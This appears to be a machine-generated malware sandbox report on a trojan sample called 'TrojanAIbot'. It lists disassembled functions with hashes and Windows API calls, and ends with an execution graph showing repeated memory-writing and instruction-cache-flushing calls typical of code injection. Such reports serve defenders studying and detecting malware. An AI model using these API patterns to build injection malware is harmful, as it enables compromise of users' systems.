                                                                                                              • Opcode ID: 37946aaf6501dcc6c486d82485adcd6686460100c9ca5b710af5310dd60f493c
                                                                                                              • Instruction ID: 7d08f89f197c56248723c645d1317e019c5e459909194ca5754ba06bf94da0a5
                                                                                                              • Opcode Fuzzy Hash: 37946aaf6501dcc6c486d82485adcd6686460100c9ca5b710af5310dd60f493c
                                                                                                              • Instruction Fuzzy Hash: C121E4B5D002089FDB10CFAAD584BEEBBF5FB48310F14841AE958A7310D374A940CF64
                                                                                                              APIs
                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 065ED592
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3795329595.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_65e0000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: TextWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 530164218-0
                                                                                                              • Opcode ID: 7576e2e649115df9f2c4f682a2d35e6837a90e29b1e068f177ba45daf82b9f32
                                                                                                              • Instruction ID: 9c9d2321046d53a37922c7dc9de463e952187a1a8f82e71f0a1f79ea0c8c1905
                                                                                                              • Opcode Fuzzy Hash: 7576e2e649115df9f2c4f682a2d35e6837a90e29b1e068f177ba45daf82b9f32
                                                                                                              • Instruction Fuzzy Hash: 532136B6D002498FDB14CF9AC444BEEBBF4FF88314F14856AD869A7250D378A645CF61
                                                                                                              APIs
                                                                                                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,065EF8C2,?,?,?,?,?), ref: 065EF967
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3795329595.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_65e0000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFromIconResource
                                                                                                              • String ID:
                                                                                                              • API String ID: 3668623891-0
                                                                                                              • Opcode ID: 23aa5478c43106b938c751f7ba65e1888b252a7a897827fe5be8bc253d1c5171
                                                                                                              • Instruction ID: 2f98c9cefebac05aad8972675546779d1b1df8af496696141d6240f043b8b660
                                                                                                              • Opcode Fuzzy Hash: 23aa5478c43106b938c751f7ba65e1888b252a7a897827fe5be8bc253d1c5171
                                                                                                              • Instruction Fuzzy Hash: 921156B290034D9FDB10CFAAC844BEEBBF8FB48310F14841AE954A7250C375A950CFA4
                                                                                                              APIs
                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 065ED592
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3795329595.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_65e0000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: TextWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 530164218-0
                                                                                                              • Opcode ID: 27e71bd9b71dbfd42815fa4ce64926aa55f3966816cb6f164a6af98f73a6d954
                                                                                                              • Instruction ID: 5705e93f757fcf548fad606ea4aadff8157eb3cc57c693db12a62d8b3db00f16
                                                                                                              • Opcode Fuzzy Hash: 27e71bd9b71dbfd42815fa4ce64926aa55f3966816cb6f164a6af98f73a6d954
                                                                                                              • Instruction Fuzzy Hash: 4D1103B6C002498FDB14CF9AC444BEEBBF4EF88310F14842AD868A7250D379A545CFA5
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,?,?,?,?,?,?,065EFC59,?,?,00000000), ref: 065EFCCD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3795329595.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_65e0000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 3850602802-0
                                                                                                              • Opcode ID: 65df7fc1f47e9db3820c274f6307e5b5a3d753cdd90520697cc900e0db55353f
                                                                                                              • Instruction ID: ecc83c208dab558a8d772c9deb85f70eb6c9cb83ad77b43ab4800e8bfc350469
                                                                                                              • Opcode Fuzzy Hash: 65df7fc1f47e9db3820c274f6307e5b5a3d753cdd90520697cc900e0db55353f
                                                                                                              • Instruction Fuzzy Hash: E01106B5904349DFDB20DF9AD544BEEBBF8FB48310F20841AE958A7210C375A944CFA5
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,?,?,?,?,?,?,065EFC59,?,?,00000000), ref: 065EFCCD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3795329595.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_65e0000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 3850602802-0
                                                                                                              • Opcode ID: fbabdbcce5bd8e9c3bcb29bbd80a9391f9a3159744712faba71943aa7c16553f
                                                                                                              • Instruction ID: b4f1c9b6f8cb8a1e9aa23b827954a86596307aca178ccc4573311cd6490f97f2
                                                                                                              • Opcode Fuzzy Hash: fbabdbcce5bd8e9c3bcb29bbd80a9391f9a3159744712faba71943aa7c16553f
                                                                                                              • Instruction Fuzzy Hash: C41103B69003498FDB20DF9AD945BEEBBF8FB48310F20841AE858A7650C375A544CFA5
                                                                                                              APIs
                                                                                                              • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 065E4115
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3795329595.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_65e0000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LongWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 1378638983-0
                                                                                                              • Opcode ID: c6c7a04e468e6c17b9ddc51139f0b0895af4c8456a12c0553fb072bb61547960
                                                                                                              • Instruction ID: 0b0c7b6e70e818e96f566dc169592ba3703c2ee7c53bf1104f75bf7eba0dd678
                                                                                                              • Opcode Fuzzy Hash: c6c7a04e468e6c17b9ddc51139f0b0895af4c8456a12c0553fb072bb61547960
                                                                                                              • Instruction Fuzzy Hash: 211136B58003088FDB20DF8AC484BDEBBF8FB48310F10841AD958A7300C375A944CFA5
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 015AD67E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3781359105.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_15a0000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              • Opcode ID: 3a141a920b42448d1cca399ccb39b628557230c83a6b5bd589a1a3d533bc1818
                                                                                                              • Instruction ID: e6992bafb54a25b70dddb7cf761c34f6f29cd648cd5bd8a876c4673d4798c6a4
                                                                                                              • Opcode Fuzzy Hash: 3a141a920b42448d1cca399ccb39b628557230c83a6b5bd589a1a3d533bc1818
                                                                                                              • Instruction Fuzzy Hash: 341110B6C003498FDB24DF9AC444BDEFBF4FB88210F10842AD869AB610C379A545CFA5
                                                                                                              APIs
                                                                                                              • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 065E4115
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3795329595.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_65e0000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LongWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 1378638983-0
                                                                                                              • Opcode ID: 01931d2a2b0b460b5e6578e3b2a8a8d38d2c235e3631d6d26c48ae69b157eb44
                                                                                                              • Instruction ID: 681a3bbdfa1abd8e006f95ac07ac8cfcba314c0bf659bc93a6340fec7f3de9dc
                                                                                                              • Opcode Fuzzy Hash: 01931d2a2b0b460b5e6578e3b2a8a8d38d2c235e3631d6d26c48ae69b157eb44
                                                                                                              • Instruction Fuzzy Hash: AB1122B98003488FDB10CF9AD585BDEBBF8FB48210F20841AD858A7700C379A944CFA5
                                                                                                              APIs
                                                                                                              • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,06663687), ref: 06664125
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3796300493.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_6660000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DispatchMessage
                                                                                                              • String ID:
                                                                                                              • API String ID: 2061451462-0
                                                                                                              • Opcode ID: 3cc6cb7389bea23479dd675ddd0718ef34d76e7a0beba1e7c2f94732a93aaa70
                                                                                                              • Instruction ID: 479be80b11d326fadb17f95be2c454b9f633d03173819a372537ec381e4fa83f
                                                                                                              • Opcode Fuzzy Hash: 3cc6cb7389bea23479dd675ddd0718ef34d76e7a0beba1e7c2f94732a93aaa70
                                                                                                              • Instruction Fuzzy Hash: AE1122B5C046488FCB20DF9AE444BDEFBF4EB48310F10842AE418A3210D374A944CFA5
                                                                                                              APIs
                                                                                                              • OleInitialize.OLE32(00000000), ref: 0666319D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3796300493.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_6660000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Initialize
                                                                                                              • String ID:
                                                                                                              • API String ID: 2538663250-0
                                                                                                              • Opcode ID: 75fc3e89d1480a23c3513a22995664f040d54def1fb3ca15eecc077fe3f4aac0
                                                                                                              • Instruction ID: e4dd13fe420989183638a2a56272e5f801a0a7b951a20a2db527856679101c37
                                                                                                              • Opcode Fuzzy Hash: 75fc3e89d1480a23c3513a22995664f040d54def1fb3ca15eecc077fe3f4aac0
                                                                                                              • Instruction Fuzzy Hash: B91133B19003088FDB20DF9AD548BDEFBF4EB48210F208419E519B7300C375A944CFA4
                                                                                                              APIs
                                                                                                              • OleInitialize.OLE32(00000000), ref: 0666319D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3796300493.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_6660000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Initialize
                                                                                                              • String ID:
                                                                                                              • API String ID: 2538663250-0
                                                                                                              • Opcode ID: 5dc0dab7d052020134b7bf7e88ba372a20f29b77f4a68003f8ba9d12bedd2cfb
                                                                                                              • Instruction ID: 8cf1655bd97e62f73e8ab8bb7b58d89861737490a79b4b53ce549d2cbb0f2c4e
                                                                                                              • Opcode Fuzzy Hash: 5dc0dab7d052020134b7bf7e88ba372a20f29b77f4a68003f8ba9d12bedd2cfb
                                                                                                              • Instruction Fuzzy Hash: 281115B59003488FDB60DF9AD544BDEFBF4AB48210F24841AE459A7350C379A944CFA5
                                                                                                              APIs
                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 065E6671
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3795329595.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_65e0000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CallProcWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2714655100-0
                                                                                                              • Opcode ID: d241d034204a7e5bf54fbc4cf465d63c2aa9cd1782c350a1253bc7b6df559d51
                                                                                                              • Instruction ID: ae95040395a28739315fef7fd4a686247cfd685b1a025b10742dec4aa793eeb8
                                                                                                              • Opcode Fuzzy Hash: d241d034204a7e5bf54fbc4cf465d63c2aa9cd1782c350a1253bc7b6df559d51
                                                                                                              • Instruction Fuzzy Hash: 7A01BC75924342CFDB64CF68E4847CABBF0FB95361F2082AAC02987650C7345445CB90
                                                                                                              APIs
                                                                                                              • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,06663687), ref: 06664125
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3796300493.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_6660000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DispatchMessage
                                                                                                              • String ID:
                                                                                                              • API String ID: 2061451462-0
                                                                                                              • Opcode ID: 329b486052ef0e24dd32700103613f6e3c9c3d3611162c5b428ebca208764ea1
                                                                                                              • Instruction ID: 836a2ba55f1e03d0b06c5191ec94cafa54262c11274865f04067697ec5486d66
                                                                                                              • Opcode Fuzzy Hash: 329b486052ef0e24dd32700103613f6e3c9c3d3611162c5b428ebca208764ea1
                                                                                                              • Instruction Fuzzy Hash: A71100B9D006498FDB20DF9AE544BDEFBF4EB48310F10852AE469A3650C379A544CFA5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3780386574.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_142d000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5743c4f3668637839bdeaa10aad9a49656315394260648bebefa92b341182da6
                                                                                                              • Instruction ID: 12872d0320a1f0a297e518520693515ed69f0d72392f1055c9ee23e2b74f0ecd
                                                                                                              • Opcode Fuzzy Hash: 5743c4f3668637839bdeaa10aad9a49656315394260648bebefa92b341182da6
                                                                                                              • Instruction Fuzzy Hash: C32125B1904340DFDB15DF54D880B16BBA1EB84318F64C56ED90A4B376C33AD487CA61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3780386574.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_142d000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8fbe156f3010f1a60eac8de45592ec1dc63f3f37282364d8698341838eaee63b
                                                                                                              • Instruction ID: bcc363d55848668be5c3477121f61343b7760c5917302237bfc623a321c9d733
                                                                                                              • Opcode Fuzzy Hash: 8fbe156f3010f1a60eac8de45592ec1dc63f3f37282364d8698341838eaee63b
                                                                                                              • Instruction Fuzzy Hash: F62180755093808FDB13CF24D590716BF71EB46214F28C5EBD8498F6A7C33A984ACB62
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3780112071.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_141d000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 943e2b7a281377cb1283453a080a112e6333018c2b5d597818b037a3e3ba2f21
                                                                                                              • Instruction ID: 0d8a82c4dd702340d112ad69b51f74a8cf65a1746be944f99d60292dcb9732f6
                                                                                                              • Opcode Fuzzy Hash: 943e2b7a281377cb1283453a080a112e6333018c2b5d597818b037a3e3ba2f21
                                                                                                              • Instruction Fuzzy Hash: 2901F7F19057409BE7205B69CC88767BF98EF41268F18C46BED0A0B29AC2759842CA72
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3780112071.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_141d000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6fedc81c6deedb1faadaf118c8cd3fc0e000d66c9010dcf871cd888805479f08
                                                                                                              • Instruction ID: b10ef079fd95574d7c5d038cb80e0e318452e0e6fed7f868e51ee818f5eea451
                                                                                                              • Opcode Fuzzy Hash: 6fedc81c6deedb1faadaf118c8cd3fc0e000d66c9010dcf871cd888805479f08
                                                                                                              • Instruction Fuzzy Hash: 77F0C2B14043449EE7208A1ACDC8B63FF98EB41278F28C45BED490F29AC2799845CA71
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000018.00000002.1645835940.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_24_2_af0000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bb1a5dd80e093005e5baf57291cac4e3e4c228d98b1d4e5a4b18240024b2d174
                                                                                                              • Instruction ID: 8de384389aaf688402d137e2c81f4353abb9aaa3fc838ac5d1d7c4d549426e29
                                                                                                              • Opcode Fuzzy Hash: bb1a5dd80e093005e5baf57291cac4e3e4c228d98b1d4e5a4b18240024b2d174
                                                                                                              • Instruction Fuzzy Hash: D562CE74A01218CFDB64DF68D894B9DBBB2BF49305F2084E9D40AA7765EB359E81CF40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000018.00000002.1645835940.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_24_2_af0000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 143935c05b4e11b398538989766964121247e33527b55d1918e3b6cac0cc723f
                                                                                                              • Instruction ID: 31879e6a721230c758f336c15fca8fae1fadc8f87b38a5bd5362a68241518c20
                                                                                                              • Opcode Fuzzy Hash: 143935c05b4e11b398538989766964121247e33527b55d1918e3b6cac0cc723f
                                                                                                              • Instruction Fuzzy Hash: 4362BF74A01218CFDB64DF68D894B9DBBB2BF49305F2084E9D40AA7765EB359E81CF40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000018.00000002.1645835940.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_24_2_af0000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 17dc47789ef6c34df9bae1146a03c1e9464eea88588265d43b9f922860f382c6
                                                                                                              • Instruction ID: 35bde9ef9aa2f1f6ae8c972238c64a2001eb172472e6632b2078019daf23fd0d
                                                                                                              • Opcode Fuzzy Hash: 17dc47789ef6c34df9bae1146a03c1e9464eea88588265d43b9f922860f382c6
                                                                                                              • Instruction Fuzzy Hash: 24012574C45219DFDB04EFB8C5583EEBBB0EB0A306F1099AAD516A3291DB780A84DF51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000018.00000002.1645835940.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_24_2_af0000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 75826516380307459debd9bb51267f5b50fc8d33cc64e9b30d95910857ea2738
                                                                                                              • Instruction ID: 417f2dcee867e8f030ee82a36430472fa84a8fe4f780dce9d1460f3f0833df29
                                                                                                              • Opcode Fuzzy Hash: 75826516380307459debd9bb51267f5b50fc8d33cc64e9b30d95910857ea2738
                                                                                                              • Instruction Fuzzy Hash: 54010874C40219DFDB04EFF4D5183AEBBB0EB09306F1099A99515A3290DB784A84DF51

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:8.2%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:1301
                                                                                                              Total number of Limit Nodes:21
                                                                                                              execution_graph 27751 2f4c350 27754 2f3f7c8 27751->27754 27753 2f4c358 27755 2f3f7d0 27754->27755 27755->27755 28847 2f388b8 27755->28847 27757 2f3f7f1 27758 2f3f7f6 27757->27758 27759 2f3f850 27758->27759 27760 2f3f87b 27759->27760 28853 2f389d0 27760->28853 27762 2f3f88e 27763 2f3f8b4 27762->27763 27764 2f3f8df 27763->27764 27765 2f389d0 4 API calls 27764->27765 27766 2f3f8f2 27765->27766 27767 2f3f918 27766->27767 27768 2f3f922 27767->27768 27769 2f389d0 4 API calls 27768->27769 27770 2f3f956 27769->27770 27771 2f3f986 27770->27771 27772 2f389d0 4 API calls 27771->27772 27773 2f3f9ba 27772->27773 27774 2f3f9ea 27773->27774 27775 2f389d0 4 API calls 27774->27775 27776 2f3fa1e 27775->27776 27777 2f3fa3c 27776->27777 27778 2f3fa4e 27777->27778 27779 2f389d0 4 API calls 27778->27779 27780 2f3fa82 27779->27780 27781 2f3faa0 27780->27781 27782 2f3fad3 27781->27782 27783 2f389d0 4 API calls 27782->27783 27784 2f3fae6 27783->27784 27785 2f3faf3 27784->27785 27786 2f4b2f8 27784->27786 28863 2f3f744 27785->28863 27788 2f3faf8 27788->27786 27789 2f3fb1e 27788->27789 27790 2f389d0 4 API calls 27789->27790 27791 2f3fb27 27790->27791 27792 2f389d0 4 API calls 27791->27792 27793 2f3fb4e 27792->27793 27794 2f389d0 4 API calls 27793->27794 27795 2f3fb81 27794->27795 27796 2f3fbd9 27795->27796 27797 2f3fbf1 27796->27797 27798 2f389d0 4 API calls 27797->27798 27799 2f3fbfd 27798->27799 27800 2f389d0 4 API calls 27799->27800 27801 2f3fc30 27800->27801 27802 2f3fc40 27801->27802 27803 2f3fc57 27802->27803 27804 2f389d0 4 API calls 27803->27804 27805 2f3fc63 27804->27805 27806 2f389d0 4 API calls 27805->27806 27807 2f3fc96 27806->27807 27808 2f3fcf9 27807->27808 27809 2f3fd06 27808->27809 27810 2f389d0 4 API calls 27809->27810 27811 2f3fd12 27810->27811 27812 2f3fd75 27811->27812 27813 2f389d0 4 API calls 27812->27813 27814 2f3fd8e 27813->27814 27815 2f389d0 4 API calls 27814->27815 27816 2f3fdc1 27815->27816 27817 2f389d0 4 API calls 27816->27817 27818 2f3fdf4 27817->27818 27819 2f389d0 4 API calls 27818->27819 27820 2f3fe27 27819->27820 27821 2f3fe48 27820->27821 27822 2f3fe7f 27821->27822 27823 2f389d0 4 API calls 27822->27823 27824 2f3fea3 27823->27824 27825 2f3feb3 27824->27825 27826 2f389d0 4 API calls 27825->27826 27827 2f3fed6 27826->27827 27828 2f3fefd 27827->27828 27829 2f389d0 4 API calls 27828->27829 27830 2f3ff09 27829->27830 27831 2f3ff30 27830->27831 27832 2f389d0 4 API calls 27831->27832 27833 2f3ff3c 27832->27833 27834 2f3ff75 27833->27834 27835 2f389d0 4 API calls 27834->27835 27836 2f3ffb8 27835->27836 27837 2f3ffe4 27836->27837 27838 2f389d0 4 API calls 27837->27838 27839 2f40034 27838->27839 27840 2f4005b 27839->27840 27841 2f389d0 4 API calls 27840->27841 27842 2f40067 27841->27842 27843 2f389d0 4 API calls 27842->27843 27844 2f4009a 27843->27844 27845 2f389d0 4 API calls 27844->27845 27846 2f400cd 27845->27846 27847 2f389d0 4 API calls 27846->27847 27848 2f40149 27847->27848 27849 2f389d0 4 API calls 27848->27849 27850 2f401c5 27849->27850 27851 2f389d0 4 API calls 27850->27851 27852 2f40241 27851->27852 27853 2f389d0 4 API calls 27852->27853 27854 2f402bd 27853->27854 27855 2f402cc 27854->27855 27856 2f40327 27855->27856 27857 2f4033f 27856->27857 27858 2f389d0 4 API calls 27857->27858 27859 2f40382 27858->27859 27860 2f403a3 27859->27860 27861 2f403bb 27860->27861 27862 2f389d0 4 API calls 27861->27862 27863 2f403fe 27862->27863 27864 2f40414 27863->27864 27865 2f40534 27864->27865 27866 2f40427 27864->27866 27868 2f40555 27865->27868 27867 2f40448 27866->27867 27870 2f389d0 4 API calls 27867->27870 27869 2f389d0 4 API calls 27868->27869 27871 2f405b0 27869->27871 27872 2f404a3 27870->27872 27874 2f405d1 27871->27874 27873 2f404c4 27872->27873 27876 2f389d0 4 API calls 27873->27876 27875 2f389d0 4 API calls 27874->27875 27877 2f4051f 27875->27877 27876->27877 27878 2f4052f 27877->27878 27879 2f4066d 27878->27879 27880 2f389d0 4 API calls 27879->27880 27881 2f406c8 27880->27881 27882 2f406e9 27881->27882 27883 2f389d0 4 API calls 27882->27883 27884 2f40744 27883->27884 27885 2f40751 27884->27885 27886 2f40794 27885->27886 27887 2f407ec 27886->27887 27888 2f40804 27887->27888 27889 2f389d0 4 API calls 27888->27889 27890 2f40810 27889->27890 27891 2f40880 27890->27891 27892 2f389d0 4 API calls 27891->27892 27893 2f4088c 27892->27893 27894 2f408fc 27893->27894 27895 2f389d0 4 API calls 27894->27895 27896 2f40908 27895->27896 27897 2f40978 27896->27897 27898 2f389d0 4 API calls 27897->27898 27899 2f40984 27898->27899 27900 2f409c5 27899->27900 27901 2f409fc 27900->27901 27902 2f40a07 27901->27902 27903 2f389d0 4 API calls 27902->27903 27904 2f40a20 27903->27904 27905 2f40a41 27904->27905 27906 2f40a4c 27905->27906 27907 2f40a78 27906->27907 27908 2f40a83 27907->27908 27909 2f389d0 4 API calls 27908->27909 27910 2f40a9c 27909->27910 27911 2f40abd 27910->27911 27912 2f40ac8 27911->27912 27913 2f40aff 27912->27913 27914 2f389d0 4 API calls 27913->27914 27915 2f40b18 27914->27915 27916 2f40b22 27915->27916 27917 2f40b2f 27916->27917 27918 2f40b42 27917->27918 27919 2f412fe 27917->27919 27921 2f40b63 27918->27921 27920 2f4132a 27919->27920 27922 2f41337 27920->27922 27924 2f40b9a 27921->27924 27923 2f41356 27922->27923 27925 2f4136e 27923->27925 27926 2f40bb2 27924->27926 27927 2f389d0 4 API calls 27925->27927 27928 2f389d0 4 API calls 27926->27928 27929 2f4137a 27927->27929 27930 2f40bbe 27928->27930 27931 2f413a6 27929->27931 27932 2f40bdf 27930->27932 27933 2f413b3 27931->27933 27935 2f40c16 27932->27935 27934 2f413d2 27933->27934 27936 2f413ea 27934->27936 27937 2f40c2e 27935->27937 27938 2f389d0 4 API calls 27936->27938 27939 2f389d0 4 API calls 27937->27939 27942 2f413f6 27938->27942 27940 2f40c3a 27939->27940 27941 2f40c5b 27940->27941 27943 2f40c66 27941->27943 27944 2f4142f 27942->27944 27946 2f40c92 27943->27946 27945 2f4144e 27944->27945 27947 2f41466 27945->27947 27949 2f389d0 4 API calls 27946->27949 27948 2f389d0 4 API calls 27947->27948 27950 2f41472 27948->27950 27951 2f40cb6 27949->27951 27952 2f41494 27950->27952 27953 2f40cd8 27951->27953 27956 2f414d0 27952->27956 27954 2f40d09 27953->27954 27955 2f40d14 27954->27955 27959 2f40d40 27955->27959 27957 2f414fc 27956->27957 27958 2f41507 27957->27958 27961 2f41514 27958->27961 27960 2f40d58 27959->27960 27963 2f389d0 4 API calls 27960->27963 27962 2f389d0 4 API calls 27961->27962 27964 2f41520 27962->27964 27965 2f40d64 27963->27965 27967 2f4154c 27964->27967 27966 2f40d85 27965->27966 27970 2f40d90 27966->27970 27968 2f41578 27967->27968 27969 2f41583 27968->27969 27972 2f41590 27969->27972 27971 2f40dd4 27970->27971 27974 2f389d0 4 API calls 27971->27974 27973 2f389d0 4 API calls 27972->27973 27975 2f4159c 27973->27975 27976 2f40de0 27974->27976 27978 2f415c8 27975->27978 28867 2f24860 27976->28867 27982 2f415ff 27978->27982 27979 2f40e01 27980 2f40e43 27979->27980 27981 2f40e50 27980->27981 27984 2f389d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 27981->27984 27983 2f389d0 4 API calls 27982->27983 27987 2f41618 27983->27987 27985 2f40e5c 27984->27985 27986 2f40e71 27985->27986 27990 2f40e84 27986->27990 27988 2f41640 27987->27988 27989 2f41661 27988->27989 27991 2f41679 27989->27991 27992 2f40ebd 27990->27992 27995 2f416a3 27991->27995 27993 2f40ee7 27992->27993 27994 2f40ef4 27993->27994 27997 2f389d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 